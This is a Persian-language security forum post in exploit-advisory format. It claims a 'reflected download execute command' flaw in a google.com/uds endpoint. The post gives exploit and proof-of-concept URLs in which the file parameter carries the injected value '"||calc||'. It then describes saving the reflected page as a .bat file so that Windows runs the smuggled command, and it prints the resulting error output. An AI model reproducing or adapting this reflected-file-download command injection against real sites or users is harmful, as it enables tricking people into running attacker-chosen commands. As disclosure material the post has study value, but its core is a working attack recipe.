discord icon
سرور دیسکورد گاردایران
Hoseinroot

reflected download execute command google.com

پست های پیشنهاد شده

for first i show new bug in cyber world from google.com
# reflected download execute command google.com

# Risk: high

# Version: All

# Date: 11/11/2017

# Author: Hosein)root

# Tested on windows; Mozilla Firefox 54

# Vulnerable File: ?file=1

# Exploit:
[+] google.com/uds/?file=1&v=1&packages=geochart

# PoC:link
[+] google.com/uds/?file="||calc||&v=1&packages=geochart


2.input file= have vulnerability . first change ?file=1 to ?file=calc
#first test and load page now save page as a bat file now run bat file and see nothing

#second test we change ?file=1 to ?file=||calc|| and load page now save page as a bat file now run bat file and see nothing

#third test we change ?file=1 to ?file="||calc|| and load page now save page as a bat file now run bat file and see execute calculator with cmd
# by this message C:\Users\??\Desktop>var error = new Error("Module: '\" || calc || ' not found!");

#video
youtu.be/gOxt2Ip6sBo

# Thank's

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری